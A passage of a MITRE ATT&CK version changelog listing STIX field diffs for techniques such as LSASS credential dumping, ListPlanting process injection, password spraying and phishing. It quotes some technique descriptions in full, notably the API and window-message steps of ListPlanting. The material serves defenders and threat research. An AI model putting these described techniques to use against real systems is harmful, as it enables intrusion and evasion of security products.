x_mitre_version | 1.2 | 1.3 |
[T1559] Inter-Process Communication
Current version: 1.3
Version changed from: 1.2 → 1.3
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_attack_spec_version | | 3.2.0 |
x_mitre_deprecated | | False |
dictionary_item_removed
STIX Field | Old value | New Value |
---|---|---|
x_mitre_permissions_required | ['Administrator', 'User', 'SYSTEM'] | |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2022-03-11 20:23:23.122000+00:00 | 2024-09-10 19:06:35.666000+00:00 |
x_mitre_version | 1.2 | 1.3 |
[T1534] Internal Spearphishing
Current version: 1.4
Version changed from: 1.3 → 1.4
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2024-02-16 13:09:39.215000+00:00 | 2024-10-15 15:59:36.741000+00:00 |
x_mitre_version | 1.3 | 1.4 |
iterable_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_platforms | | Office Suite |
iterable_item_removed
STIX Field | Old value | New Value |
---|---|---|
x_mitre_platforms | Office 365 | |
x_mitre_platforms | Google Workspace | |
[T1059.007] Command and Scripting Interpreter: JavaScript
Current version: 2.2
Version changed from: 2.1 → 2.2
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_attack_spec_version | | 3.2.0 |
x_mitre_deprecated | | False |
x_mitre_remote_support | | False |
dictionary_item_removed
STIX Field | Old value | New Value |
---|---|---|
x_mitre_permissions_required | ['User', 'Administrator', 'SYSTEM'] | |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2021-08-16 21:02:05.142000+00:00 | 2024-07-30 14:12:52.698000+00:00 |
x_mitre_version | 2.1 | 2.2 |
[T1003.004] OS Credential Dumping: LSA Secrets
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_attack_spec_version | | 3.2.0 |
x_mitre_deprecated | | False |
dictionary_item_removed
STIX Field | Old value | New Value |
---|---|---|
x_mitre_permissions_required | ['SYSTEM'] | |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2021-04-21 21:12:38.361000+00:00 | 2024-08-13 15:49:17.591000+00:00 |
x_mitre_version | 1.0 | 1.1 |
[T1003.001] OS Credential Dumping: LSASS Memory
Current version: 1.5
Version changed from: 1.4 → 1.5
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-12-27 17:57:20.003000+00:00 | 2024-08-13 13:52:45.379000+00:00 |
x_mitre_version | 1.4 | 1.5 |
iterable_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_contributors | | Michael Forret, Quorum Cyber |
[T1569.001] System Services: Launchctl
Current version: 1.2
Version changed from: 1.1 → 1.2
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_attack_spec_version | | 3.2.0 |
x_mitre_deprecated | | False |
x_mitre_remote_support | | False |
dictionary_item_removed
STIX Field | Old value | New Value |
---|---|---|
x_mitre_permissions_required | ['User', 'root'] | |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2021-10-15 18:40:23.141000+00:00 | 2024-09-20 20:14:35.179000+00:00 |
x_mitre_version | 1.1 | 1.2 |
[T1055.015] Process Injection: ListPlanting
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_attack_spec_version | | 3.2.0 |
x_mitre_deprecated | | False |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2022-03-08 20:59:20.762000+00:00 | 2024-08-14 17:34:33.948000+00:00 |
description | Adversaries may abuse list-view controls to inject malicious code into hijacked processes in order to evade process-based defenses as well as possibly elevate privileges. ListPlanting is a method of executing arbitrary code in the address space of a separate live process. Code executed via ListPlanting may also evade detection from security products since the execution is masked under a legitimate process.
List-view controls are user interface windows used to display collections of items.(Citation: Microsoft List View Controls) Information about an application's list-view settings are stored within the process' memory in a SysListView32 control.
ListPlanting (a form of message-passing "shatter attack") may be performed by copying code into the virtual address space of a process that uses a list-view control then using that code as a custom callback for sorting the listed items.(Citation: Modexp Windows Process Injection) Adversaries must first copy code into the target process’ memory space, which can be performed various ways including by directly obtaining a handle to the SysListView32 child of the victim process window (via Windows API calls such as FindWindow and/or EnumWindows ) or other [Process Injection](https://attack.mitre.org/techniques/T1055) methods.
Some variations of ListPlanting may allocate memory in the target process but then use window messages to copy the payload, to avoid the use of the highly monitored WriteProcessMemory function. For example, an adversary can use the PostMessage and/or SendMessage API functions to send LVM_SETITEMPOSITION and LVM_GETITEMPOSITION messages, effectively copying a payload 2 bytes at a time to the allocated memory.(Citation: ESET InvisiMole June 2020)
Finally, the payload is triggered by sending the LVM_SORTITEMS message to the SysListView32 child of the process window, with the payload within the newly allocated buffer passed and executed as the ListView_SortItems callback. | Adversaries may abuse list-view controls to inject malicious code into hijacked processes in order to evade process-based defenses as well as possibly elevate privileges. ListPlanting is a method of executing arbitrary code in the address space of a separate live process.(Citation: Hexacorn Listplanting) Code executed via ListPlanting may also evade detection from security products since the execution is masked under a legitimate process.
List-view controls are user interface windows used to display collections of items.(Citation: Microsoft List View Controls) Information about an application's list-view settings are stored within the process' memory in a SysListView32 control.
ListPlanting (a form of message-passing "shatter attack") may be performed by copying code into the virtual address space of a process that uses a list-view control then using that code as a custom callback for sorting the listed items.(Citation: Modexp Windows Process Injection) Adversaries must first copy code into the target process’ memory space, which can be performed various ways including by directly obtaining a handle to the SysListView32 child of the victim process window (via Windows API calls such as FindWindow and/or EnumWindows ) or other [Process Injection](https://attack.mitre.org/techniques/T1055) methods.
Some variations of ListPlanting may allocate memory in the target process but then use window messages to copy the payload, to avoid the use of the highly monitored WriteProcessMemory function. For example, an adversary can use the PostMessage and/or SendMessage API functions to send LVM_SETITEMPOSITION and LVM_GETITEMPOSITION messages, effectively copying a payload 2 bytes at a time to the allocated memory.(Citation: ESET InvisiMole June 2020)
Finally, the payload is triggered by sending the LVM_SORTITEMS message to the SysListView32 child of the process window, with the payload within the newly allocated buffer passed and executed as the ListView_SortItems callback. |
x_mitre_version | 1.0 | 1.1 |
iterable_item_added
STIX Field | Old value | New Value |
---|---|---|
external_references | | {'source_name': 'Hexacorn Listplanting', 'description': 'Hexacorn. (2019, April 25). Listplanting – yet another code injection trick. Retrieved August 14, 2024.', 'url': 'https://www.hexacorn.com/blog/2019/04/25/listplanting-yet-another-code-injection-trick/'} |
[T1654] Log Enumeration
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-09-30 22:18:46.711000+00:00 | 2024-10-15 12:24:40.892000+00:00 |
description | Adversaries may enumerate system and service logs to find useful data. These logs may highlight various types of valuable insights for an adversary, such as user authentication records ([Account Discovery](https://attack.mitre.org/techniques/T1087)), security or vulnerable software ([Software Discovery](https://attack.mitre.org/techniques/T1518)), or hosts within a compromised network ([Remote System Discovery](https://attack.mitre.org/techniques/T1018)).
Host binaries may be leveraged to collect system logs. Examples include using `wevtutil.exe` or [PowerShell](https://attack.mitre.org/techniques/T1059/001) on Windows to access and/or export security event information.(Citation: WithSecure Lazarus-NoPineapple Threat Intel Report 2023)(Citation: Cadet Blizzard emerges as novel threat actor) In cloud environments, adversaries may leverage utilities such as the Azure VM Agent’s `CollectGuestLogs.exe` to collect security logs from cloud hosted infrastructure.(Citation: SIM Swapping and Abuse of the Microsoft Azure Serial Console)
Adversaries may also target centralized logging infrastructure such as SIEMs. Logs may also be bulk exported and sent to adversary-controlled infrastructure for offline analysis. | Adversaries may enumerate system and service logs to find useful data. These logs may highlight various types of valuable insights for an adversary, such as user authentication records ([Account Discovery](https://attack.mitre.org/techniques/T1087)), security or vulnerable software ([Software Discovery](https://attack.mitre.org/techniques/T1518)), or hosts within a compromised network ([Remote System Discovery](https://attack.mitre.org/techniques/T1018)).
Host binaries may be leveraged to collect system logs. Examples include using `wevtutil.exe` or [PowerShell](https://attack.mitre.org/techniques/T1059/001) on Windows to access and/or export security event information.(Citation: WithSecure Lazarus-NoPineapple Threat Intel Report 2023)(Citation: Cadet Blizzard emerges as novel threat actor) In cloud environments, adversaries may leverage utilities such as the Azure VM Agent’s `CollectGuestLogs.exe` to collect security logs from cloud hosted infrastructure.(Citation: SIM Swapping and Abuse of the Microsoft Azure Serial Console)
Adversaries may also target centralized logging infrastructure such as SIEMs. Logs may also be bulk exported and sent to adversary-controlled infrastructure for offline analysis.
In addition to gaining a better understanding of the environment, adversaries may also monitor logs in real time to track incident response procedures. This may allow them to adjust their techniques in order to maintain persistence or evade defenses.(Citation: Permiso GUI-Vil 2023) |
x_mitre_version | 1.0 | 1.1 |
iterable_item_added
STIX Field | Old value | New Value |
---|---|---|
external_references | | {'source_name': 'Permiso GUI-Vil 2023', 'description': 'Ian Ahl. (2023, May 22). Unmasking GUI-Vil: Financially Motivated Cloud Threat Actor. Retrieved August 30, 2024.', 'url': 'https://permiso.io/blog/s/unmasking-guivil-new-cloud-threat-actor/'} |
x_mitre_contributors | | Menachem Goldstein |
[T1204.002] User Execution: Malicious File
Current version: 1.4
Version changed from: 1.3 → 1.4
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-04-21 12:22:19.740000+00:00 | 2024-09-25 20:50:34.876000+00:00 |
description | An adversary may rely upon a user opening a malicious file in order to gain execution. Users may be subjected to social engineering to get them to open a file that will lead to code execution. This user action will typically be observed as follow-on behavior from [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001). Adversaries may use several types of files that require a user to execute them, including .doc, .pdf, .xls, .rtf, .scr, .exe, .lnk, .pif, and .cpl.
Adversaries may employ various forms of [Masquerading](https://attack.mitre.org/techniques/T1036) and [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027) to increase the likelihood that a user will open and successfully execute a malicious file. These methods may include using a familiar naming convention and/or password protecting the file and supplying instructions to a user on how to open it.(Citation: Password Protected Word Docs)
While [Malicious File](https://attack.mitre.org/techniques/T1204/002) frequently occurs shortly after Initial Access it may occur at other phases of an intrusion, such as when an adversary places a file in a shared directory or on a user's desktop hoping that a user will click on it. This activity may also be seen shortly after [Internal Spearphishing](https://attack.mitre.org/techniques/T1534). | An adversary may rely upon a user opening a malicious file in order to gain execution. Users may be subjected to social engineering to get them to open a file that will lead to code execution. This user action will typically be observed as follow-on behavior from [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001). Adversaries may use several types of files that require a user to execute them, including .doc, .pdf, .xls, .rtf, .scr, .exe, .lnk, .pif, .cpl, and .reg.
Adversaries may employ various forms of [Masquerading](https://attack.mitre.org/techniques/T1036) and [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027) to increase the likelihood that a user will open and successfully execute a malicious file. These methods may include using a familiar naming convention and/or password protecting the file and supplying instructions to a user on how to open it.(Citation: Password Protected Word Docs)
While [Malicious File](https://attack.mitre.org/techniques/T1204/002) frequently occurs shortly after Initial Access it may occur at other phases of an intrusion, such as when an adversary places a file in a shared directory or on a user's desktop hoping that a user will click on it. This activity may also be seen shortly after [Internal Spearphishing](https://attack.mitre.org/techniques/T1534). |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
x_mitre_version | 1.3 | 1.4 |
[T1204.001] User Execution: Malicious Link
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_attack_spec_version | | 3.2.0 |
x_mitre_deprecated | | False |
x_mitre_remote_support | | False |
dictionary_item_removed
STIX Field | Old value | New Value |
---|---|---|
x_mitre_permissions_required | ['User'] | |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2020-03-11 14:43:31.706000+00:00 | 2024-09-10 16:40:03.786000+00:00 |
x_mitre_version | 1.0 | 1.1 |
[T1556] Modify Authentication Process
Current version: 2.5
Version changed from: 2.4 → 2.5
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2024-04-11 21:51:44.851000+00:00 | 2024-10-14 22:11:30.271000+00:00 |
x_mitre_version | 2.4 | 2.5 |
x_mitre_platforms[7] | Office 365 | Identity Provider |
iterable_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_platforms | | Office Suite |
iterable_item_removed
STIX Field | Old value | New Value |
---|---|---|
x_mitre_platforms | Azure AD | |
x_mitre_platforms | Google Workspace | |
[T1556.006] Modify Authentication Process: Multi-Factor Authentication
Current version: 1.3
Version changed from: 1.2 → 1.3
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2024-04-16 00:20:21.488000+00:00 | 2024-10-14 22:11:30.271000+00:00 |
x_mitre_version | 1.2 | 1.3 |
x_mitre_platforms[5] | Google Workspace | Office Suite |
iterable_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_contributors | | Arun Seelagan, CISA |
x_mitre_platforms | | Identity Provider |
iterable_item_removed
STIX Field | Old value | New Value |
---|---|---|
x_mitre_platforms | Azure AD | |
x_mitre_platforms | Office 365 | |
[T1621] Multi-Factor Authentication Request Generation
Current version: 1.2
Version changed from: 1.1 → 1.2
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2024-04-19 04:26:29.365000+00:00 | 2024-10-14 22:11:30.271000+00:00 |
x_mitre_version | 1.1 | 1.2 |
x_mitre_platforms[6] | Azure AD | Identity Provider |
iterable_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_contributors | | Arun Seelagan, CISA |
x_mitre_platforms | | Office Suite |
iterable_item_removed
STIX Field | Old value | New Value |
---|---|---|
x_mitre_platforms | Office 365 | |
x_mitre_platforms | Google Workspace | |
[T1090.003] Proxy: Multi-hop Proxy
Current version: 2.2
Version changed from: 2.1 → 2.2
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2024-04-19 13:24:36.872000+00:00 | 2024-09-25 20:48:24.411000+00:00 |
description | Adversaries may chain together multiple proxies to disguise the source of malicious traffic. Typically, a defender will be able to identify the last proxy traffic traversed before it enters their network; the defender may or may not be able to identify any previous proxies before the last-hop proxy. This technique makes identifying the original source of the malicious traffic even more difficult by requiring the defender to trace malicious traffic through several proxies to identify its source.
For example, adversaries may construct or use onion routing networks – such as the publicly available [Tor](https://attack.mitre.org/software/S0183) network – to transport encrypted C2 traffic through a compromised population, allowing communication with any device within the network.(Citation: Onion Routing)
In the case of network infrastructure, it is possible for an adversary to leverage multiple compromised devices to create a multi-hop proxy chain (i.e., [Network Devices](https://attack.mitre.org/techniques/T1584/008)). By leveraging [Patch System Image](https://attack.mitre.org/techniques/T1601/001) on routers, adversaries can add custom code to the affected network devices that will implement onion routing between those nodes. This method is dependent upon the [Network Boundary Bridging](https://attack.mitre.org/techniques/T1599) method allowing the adversaries to cross the protected network boundary of the Internet perimeter and into the organization’s Wide-Area Network (WAN). Protocols such as ICMP may be used as a transport.
Similarly, adversaries may abuse peer-to-peer (P2P) and blockchain-oriented infrastructure to implement routing between a decentralized network of peers.(Citation: NGLite Trojan) | Adversaries may chain together multiple proxies to disguise the source of malicious traffic. Typically, a defender will be able to identify the last proxy traffic traversed before it enters their network; the defender may or may not be able to identify any previous proxies before the last-hop proxy. This technique makes identifying the original source of the malicious traffic even more difficult by requiring the defender to trace malicious traffic through several proxies to identify its source.
For example, adversaries may construct or use onion routing networks – such as the publicly available [Tor](https://attack.mitre.org/software/S0183) network – to transport encrypted C2 traffic through a compromised population, allowing communication with any device within the network.(Citation: Onion Routing) Adversaries may also use operational relay box (ORB) networks composed of virtual private servers (VPS), Internet of Things (IoT) devices, smart devices, and end-of-life routers to obfuscate their operations. (Citation: ORB Mandiant)
In the case of network infrastructure, it is possible for an adversary to leverage multiple compromised devices to create a multi-hop proxy chain (i.e., [Network Devices](https://attack.mitre.org/techniques/T1584/008)). By leveraging [Patch System Image](https://attack.mitre.org/techniques/T1601/001) on routers, adversaries can add custom code to the affected network devices that will implement onion routing between those nodes. This method is dependent upon the [Network Boundary Bridging](https://attack.mitre.org/techniques/T1599) method allowing the adversaries to cross the protected network boundary of the Internet perimeter and into the organization’s Wide-Area Network (WAN). Protocols such as ICMP may be used as a transport.
Similarly, adversaries may abuse peer-to-peer (P2P) and blockchain-oriented infrastructure to implement routing between a decentralized network of peers.(Citation: NGLite Trojan) |
x_mitre_version | 2.1 | 2.2 |
iterable_item_added
STIX Field | Old value | New Value |
---|---|---|
external_references | | {'source_name': 'ORB Mandiant', 'description': 'Raggi, Michael. (2024, May 22). IOC Extinction? China-Nexus Cyber Espionage Actors Use ORB Networks to Raise Cost on Defenders. Retrieved July 8, 2024.', 'url': 'https://cloud.google.com/blog/topics/threat-intelligence/china-nexus-espionage-orb-networks'} |
[T1498] Network Denial of Service
Current version: 1.2
Version changed from: 1.1 → 1.2
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_attack_spec_version | | 3.2.0 |
x_mitre_deprecated | | False |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2022-03-25 20:05:40.122000+00:00 | 2024-10-15 16:01:00.510000+00:00 |
external_references[2]['description'] | FS-ISAC. (2012, September 17). Fraud Alert – Cyber Criminals Targeting Financial Institution Employee Credentials to Conduct Wire Transfer Fraud. Retrieved April 18, 2019. | FS-ISAC. (2012, September 17). Fraud Alert – Cyber Criminals Targeting Financial Institution Employee Credentials to Conduct Wire Transfer Fraud. Retrieved September 23, 2024. |
external_references[2]['url'] | https://www.ic3.gov/media/2012/FraudAlertFinancialInstitutionEmployeeCredentialsTargeted.pdf | https://www.ic3.gov/Media/PDF/Y2012/FraudAlertFinancialInstitutionEmployeeCredentialsTargeted.pdf |
x_mitre_version | 1.1 | 1.2 |
iterable_item_removed
STIX Field | Old value | New Value |
---|---|---|
x_mitre_platforms | Azure AD | |
x_mitre_platforms | Office 365 | |
x_mitre_platforms | SaaS | |
x_mitre_platforms | Google Workspace | |
[T1137] Office Application Startup
Current version: 1.4
Version changed from: 1.3 → 1.4
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_attack_spec_version | | 3.2.0 |
x_mitre_deprecated | | False |
dictionary_item_removed
STIX Field | Old value | New Value |
---|---|---|
x_mitre_permissions_required | ['User', 'Administrator'] | |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2021-10-15 20:18:31.112000+00:00 | 2024-10-15 16:01:21.255000+00:00 |
x_mitre_version | 1.3 | 1.4 |
x_mitre_platforms[1] | Office 365 | Office Suite |
[T1137.001] Office Application Startup: Office Template Macros
Current version: 1.2
Version changed from: 1.1 → 1.2
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_attack_spec_version | | 3.2.0 |
x_mitre_deprecated | | False |
dictionary_item_removed
STIX Field | Old value | New Value |
---|---|---|
x_mitre_permissions_required | ['User', 'Administrator'] | |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2021-08-16 21:27:10.873000+00:00 | 2024-10-15 16:01:35.918000+00:00 |
x_mitre_version | 1.1 | 1.2 |
x_mitre_platforms[1] | Office 365 | Office Suite |
[T1137.002] Office Application Startup: Office Test
Current version: 1.3
Version changed from: 1.2 → 1.3
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2024-04-16 12:41:55.175000+00:00 | 2024-10-15 16:01:48.325000+00:00 |
x_mitre_version | 1.2 | 1.3 |
x_mitre_platforms[1] | Office 365 | Office Suite |
[T1137.003] Office Application Startup: Outlook Forms
Current version: 1.2
Version changed from: 1.1 → 1.2
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_attack_spec_version | | 3.2.0 |
x_mitre_deprecated | | False |
dictionary_item_removed
STIX Field | Old value | New Value |
---|---|---|
x_mitre_permissions_required | ['Administrator', 'User'] | |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2021-08-16 21:29:19.697000+00:00 | 2024-10-15 16:02:00.782000+00:00 |
x_mitre_version | 1.1 | 1.2 |
x_mitre_platforms[1] | Office 365 | Office Suite |
[T1137.004] Office Application Startup: Outlook Home Page
Current version: 1.2
Version changed from: 1.1 → 1.2
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_attack_spec_version | | 3.2.0 |
x_mitre_deprecated | | False |
dictionary_item_removed
STIX Field | Old value | New Value |
---|---|---|
x_mitre_permissions_required | ['Administrator', 'User'] | |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2021-08-16 21:30:01.743000+00:00 | 2024-10-15 16:02:13.742000+00:00 |
x_mitre_version | 1.1 | 1.2 |
x_mitre_platforms[1] | Office 365 | Office Suite |
[T1137.005] Office Application Startup: Outlook Rules
Current version: 1.2
Version changed from: 1.1 → 1.2
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_attack_spec_version | | 3.2.0 |
x_mitre_deprecated | | False |
dictionary_item_removed
STIX Field | Old value | New Value |
---|---|---|
x_mitre_permissions_required | ['Administrator', 'User'] | |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2021-10-15 20:18:30.700000+00:00 | 2024-10-15 16:02:26.206000+00:00 |
x_mitre_version | 1.1 | 1.2 |
x_mitre_platforms[1] | Office 365 | Office Suite |
[T1110.002] Brute Force: Password Cracking
Current version: 1.3
Version changed from: 1.2 → 1.3
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-03-30 21:01:48.643000+00:00 | 2024-10-14 22:11:30.271000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
x_mitre_version | 1.2 | 1.3 |
x_mitre_platforms[4] | Azure AD | Office Suite |
iterable_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_platforms | | Identity Provider |
iterable_item_removed
STIX Field | Old value | New Value |
---|---|---|
x_mitre_platforms | Office 365 | |
[T1556.002] Modify Authentication Process: Password Filter DLL
Current version: 2.1
Version changed from: 2.0 → 2.1
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_attack_spec_version | | 3.2.0 |
x_mitre_deprecated | | False |
dictionary_item_removed
STIX Field | Old value | New Value |
---|---|---|
x_mitre_permissions_required | ['Administrator', 'SYSTEM'] | |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2021-04-20 20:11:55.147000+00:00 | 2024-08-21 16:16:18.271000+00:00 |
x_mitre_version | 2.0 | 2.1 |
[T1110.001] Brute Force: Password Guessing
Current version: 1.6
Version changed from: 1.5 → 1.6
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-10-16 16:57:41.743000+00:00 | 2024-10-14 22:11:30.271000+00:00 |
x_mitre_version | 1.5 | 1.6 |
x_mitre_platforms[7] | Google Workspace | Office Suite |
iterable_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_platforms | | Identity Provider |
iterable_item_removed
STIX Field | Old value | New Value |
---|---|---|
x_mitre_platforms | Azure AD | |
x_mitre_platforms | Office 365 | |
[T1555.005] Credentials from Password Stores: Password Managers
Current version: 1.1
Version changed from: 1.0 → 1.1
New Mitigations:
- M1017: User Training
- M1018: User Account Management
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_attack_spec_version | | 3.2.0 |
x_mitre_deprecated | | False |
dictionary_item_removed
STIX Field | Old value | New Value |
---|---|---|
x_mitre_permissions_required | ['User'] | |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2022-03-25 13:18:55.310000+00:00 | 2024-08-19 13:53:33.661000+00:00 |
x_mitre_version | 1.0 | 1.1 |
[T1201] Password Policy Discovery
Current version: 1.6
Version changed from: 1.5 → 1.6
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2022-09-06 22:01:45.067000+00:00 | 2024-10-15 16:02:44.477000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
x_mitre_version | 1.5 | 1.6 |
iterable_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_platforms | | Identity Provider |
x_mitre_platforms | | SaaS |
x_mitre_platforms | | Office Suite |
[T1110.003] Brute Force: Password Spraying
Current version: 1.6
Version changed from: 1.5 → 1.6
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2024-03-07 14:33:34.201000+00:00 | 2024-10-14 22:11:30.271000+00:00 |
x_mitre_version | 1.5 | 1.6 |
x_mitre_platforms[7] | Google Workspace | Office Suite |
iterable_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_platforms | | Identity Provider |
iterable_item_removed
STIX Field | Old value | New Value |
---|---|---|
x_mitre_platforms | Azure AD | |
x_mitre_platforms | Office 365 | |
[T1069] Permission Groups Discovery
Current version: 2.6
Version changed from: 2.5 → 2.6
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-04-15 17:26:53.365000+00:00 | 2024-10-15 16:03:06.294000+00:00 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
x_mitre_version | 2.5 | 2.6 |
x_mitre_platforms[7] | Google Workspace | Identity Provider |
iterable_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_platforms | | Office Suite |
iterable_item_removed
STIX Field | Old value | New Value |
---|---|---|
x_mitre_platforms | Azure AD | |
x_mitre_platforms | Office 365 | |
[T1566] Phishing
Current version: 2.6
Version changed from: 2.5 → 2.6
Description diff (old → new; only the passage that changed is shown here, the full old and new description values are listed under Details):
- Old: "...the identity of the sender which can be used to fool both the human recipient as well as automated security tools.(Citation: cyberproof-double-bounce) Victims may also receive phishing messages that instruct them to call a phone number..."
- New: "...the identity of the sender which can be used to fool both the human recipient as well as automated security tools,(Citation: cyberproof-double-bounce) or by including the intended target as a party to an existing email thread that includes malicious files or links (i.e., "thread hijacking").(Citation: phishing-krebs) Victims may also receive phishing messages that instruct them to call a phone number..."
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2024-03-01 16:56:32.245000+00:00 | 2024-10-07 15:00:19.668000+00:00 |
description | Adversaries may send phishing messages to gain access to victim systems. All forms of phishing are electronically delivered social engineering. Phishing can be targeted, known as spearphishing. In spearphishing, a specific individual, company, or industry will be targeted by the adversary. More generally, adversaries can conduct non-targeted phishing, such as in mass malware spam campaigns.
Adversaries may send victims emails containing malicious attachments or links, typically to execute malicious code on victim systems. Phishing may also be conducted via third-party services, like social media platforms. Phishing may also involve social engineering techniques, such as posing as a trusted source, as well as evasive techniques such as removing or manipulating emails or metadata/headers from compromised accounts being abused to send messages (e.g., [Email Hiding Rules](https://attack.mitre.org/techniques/T1564/008)).(Citation: Microsoft OAuth Spam 2022)(Citation: Palo Alto Unit 42 VBA Infostealer 2014) Another way to accomplish this is by forging or spoofing(Citation: Proofpoint-spoof) the identity of the sender which can be used to fool both the human recipient as well as automated security tools.(Citation: cyberproof-double-bounce)
Victims may also receive phishing messages that instruct them to call a phone number where they are directed to visit a malicious URL, download malware,(Citation: sygnia Luna Month)(Citation: CISA Remote Monitoring and Management Software) or install adversary-accessible remote management tools onto their computer (i.e., [User Execution](https://attack.mitre.org/techniques/T1204)).(Citation: Unit42 Luna Moth) | Adversaries may send phishing messages to gain access to victim systems. All forms of phishing are electronically delivered social engineering. Phishing can be targeted, known as spearphishing. In spearphishing, a specific individual, company, or industry will be targeted by the adversary. More generally, adversaries can conduct non-targeted phishing, such as in mass malware spam campaigns.
Adversaries may send victims emails containing malicious attachments or links, typically to execute malicious code on victim systems. Phishing may also be conducted via third-party services, like social media platforms. Phishing may also involve social engineering techniques, such as posing as a trusted source, as well as evasive techniques such as removing or manipulating emails or metadata/headers from compromised accounts being abused to send messages (e.g., [Email Hiding Rules](https://attack.mitre.org/techniques/T1564/008)).(Citation: Microsoft OAuth Spam 2022)(Citation: Palo Alto Unit 42 VBA Infostealer 2014) Another way to accomplish this is by forging or spoofing(Citation: Proofpoint-spoof) the identity of the sender which can be used to fool both the human recipient as well as automated security tools,(Citation: cyberproof-double-bounce) or by including the intended target as a party to an existing email thread that includes malicious files or links (i.e., "thread hijacking").(Citation: phishing-krebs)
Victims may also receive phishing messages that instruct them to call a phone number where they are directed to visit a malicious URL, download malware,(Citation: sygnia Luna Month)(Citation: CISA Remote Monitoring and Management Software) or install adversary-accessible remote management tools onto their computer (i.e., [User Execution](https://attack.mitre.org/techniques/T1204)).(Citation: Unit42 Luna Moth) |
external_references[1]['url'] | https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf | https://web.archive.org/web/20210708014107/https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf |
x_mitre_version | 2.5 | 2.6 |
x_mitre_platforms[4] | Office 365 | Identity Provider |
x_mitre_platforms[5] | Google Workspace | Office Suite |
iterable_item_added
STIX Field | Old value | New Value |
---|---|---|
external_references | | {'source_name': 'phishing-krebs', 'description': 'Brian Krebs. (2024, March 28). Thread Hijacking: Phishes That Prey on Your Curiosity. Retrieved September 27, 2024.', 'url': 'https://krebsonsecurity.com/2024/03/thread-hijacking-phishes-that-prey-on-your-curiosity/'} |
[T1556.003] Modify Authentication Process: Pluggable Authentication Modules
Current version: 2.1
Version changed from: 2.0 → 2.1
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_attack_spec_version | | 3.2.0 |
x_mitre_deprecated | | False |
dictionary_item_removed
STIX Field | Old value | New Value |
---|---|---|
x_mitre_permissions_required | ['root'] | |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2021-10-17 14:48:33.580000+00:00 | 2024-08-21 16:19:55.082000+00:00 |
x_mitre_version | 2.0 | 2.1 |
[T1552.004] Unsecured Credentials: Private Keys
Current version: 1.2
Version changed from: 1.1 → 1.2
Description diff (old → new; only the sentence that changed is shown here, the full old and new description values are listed under Details):
